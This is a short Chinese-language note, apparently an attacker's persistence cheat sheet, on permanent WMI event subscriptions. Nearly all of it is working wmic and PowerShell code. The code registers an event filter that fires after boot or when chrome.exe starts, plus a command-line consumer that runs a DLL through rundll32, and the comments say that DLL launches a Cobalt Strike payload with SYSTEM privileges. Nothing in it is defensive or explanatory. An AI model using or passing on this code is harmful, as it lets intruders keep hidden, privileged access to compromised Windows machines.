WMI事件

#注册一个事件过滤器，该过滤器是开机2分钟到2分半钟，由于是永久WMI事件订阅，故需要管理员权限，最终获取到权限也是system权限
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
#注册一个事件消费者，这里写入了要执行的命令，是用 rundll32 启动 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
#绑定事件 过滤器和事件消费者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""

$wmiParams = @{
  NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
  Name           = 'BugSecFilter'
  EventNamespace = 'root\CIMV2'
  QueryLanguage  = 'WQL'
  Query          = "select * from __InstanceCreationEvent  within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
  Name                = 'BugSecConsumer'
  CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
  Filter   = $filterResult
  Consumer = $consumerResult
}
Set-WmiInstance @wmiParams